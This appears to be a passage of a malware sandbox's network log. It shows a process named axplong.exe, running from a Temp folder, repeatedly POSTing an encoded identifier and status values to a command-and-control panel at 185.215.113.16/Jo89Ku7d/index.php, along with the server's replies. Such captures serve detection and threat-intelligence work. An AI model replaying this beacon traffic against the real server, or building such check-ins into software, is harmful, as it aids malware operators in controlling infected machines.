Jul 26, 2024 20:58:38.325314999 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:38.636431932 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:38.914558887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49740	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:39.037410021 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:39.808726072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:39.828140974 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:40.081197977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49741	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:40.191844940 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:40.993140936 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:40.994426012 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:41.247082949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49742	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:41.361818075 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:42.116513014 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:42.117451906 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:42.366312027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49743	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:42.486658096 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:43.253310919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:43.254023075 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:43.516658068 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49744	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:43.628052950 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:44.378709078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:44.379667997 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:44.626416922 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49745	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:44.737216949 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:45.478420973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:45.479196072 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:45.724616051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49746	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:45.850002050 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:46.613194942 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:46.614039898 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:46.863632917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49747	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:46.971175909 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:47.711698055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:47.715014935 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:47.975126982 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49748	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:48.095824003 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:48.838536024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:48.839401960 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:49.083878994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49749	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:49.206029892 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:50.004976034 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:50.008418083 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:50.274813890 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49750	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:50.393661976 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:51.161209106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:51.162239075 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:51.413222075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49751	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:51.548163891 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:52.297684908 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
